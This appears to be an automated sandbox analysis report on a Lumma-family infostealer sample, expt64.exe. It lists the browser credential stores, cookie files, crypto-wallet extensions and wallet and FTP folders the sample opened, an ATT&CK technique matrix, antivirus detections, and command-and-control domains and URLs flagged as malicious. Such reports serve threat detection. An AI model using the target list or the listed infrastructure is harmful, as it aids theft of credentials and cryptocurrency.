              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              expt64.exe66%ReversingLabsWin32.Spyware.Lummastealer
              expt64.exe72%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://checkout.steampows0%Avira URL Cloudsafe
              http://ocsp.sectigo.com050%Avira URL Cloudsafe
              https://steambroadcast-test.akamaized#0%Avira URL Cloudsafe
              https://wordyfindy.lat/apiM:100%Avira URL Cloudmalware
              https://sputnik-1985.com/t100%Avira URL Cloudmalware
              https://sputnik-1985.com/100%Avira URL Cloudmalware
              https://sputnik-1985.com/apijOg100%Avira URL Cloudmalware
              https://sputnik-1985.com/apiing100%Avira URL Cloudmalware
              brendon-sharjen.biz100%Avira URL Cloudmalware
              https://help.stC0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              104.102.49.254
              truefalse
                high
                sputnik-1985.com
                104.21.64.1
                truefalse
                  high
                  wordyfindy.lat
                  unknown
                  unknownfalse
                    high
                    slipperyloo.lat
                    unknown
                    unknownfalse
                      high
                      curverpluch.lat
                      unknown
                      unknownfalse
                        high
                        tentabatte.lat
                        unknown
                        unknownfalse
                          high
                          manyrestro.lat
                          unknown
                          unknownfalse
                            high
                            bashfulacid.lat
                            unknown
                            unknownfalse
                              high
                              brendon-sharjen.biz
                              unknown
                              unknownfalse
                                high
                                shapestickyr.lat
                                unknown
                                unknownfalse
                                  high
                                  talkynicer.lat
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    slipperyloo.latfalse
                                      high
                                      https://sputnik-1985.com/apifalse
                                        high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          high
                                          brendon-sharjen.biztrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          curverpluch.latfalse
                                            high
                                            tentabatte.latfalse
                                              high
                                              manyrestro.latfalse
                                                high
                                                bashfulacid.latfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/chrome_newtabexpt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUexpt64.exefalse
                                                        high
                                                        https://player.vimeo.comexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#expt64.exefalse
                                                              high
                                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0expt64.exefalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampexpt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#expt64.exefalse
                                                                      high
                                                                      https://store.steampowered.com/subscriber_agreement/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.gstatic.cn/recaptcha/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.fastly.expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.com/recaptcexpt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://sputnik-1985.com/texpt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://www.valvesoftware.com/legal.htmexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.youtube.comexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.google.comexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://checkout.steampowsexpt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englexpt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisexpt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://s.ytimg.com;expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.tv/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://wordyfindy.lat/apiM:expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#expt64.exefalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://ocsp.sectigo.com05expt64.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/points/shop/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://steambroadcast-test.akamaized#expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sketchfab.comexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://lv.queniujq.cnexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brexpt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.youtube.com/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/privacy_agreement/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engexpt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_Aexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sputnik-1985.com/expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2516733335.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.000000000065A000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580509230.0000000000685000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://sputnik-1985.com/apiingexpt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://sputnik-1985.com/apijOgexpt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zexpt64.exefalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/recaptcha/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://checkout.steampowered.com/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/;expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/about/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://ocsp.sectigo.com0expt64.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://help.steampowered.com/en/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/market/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
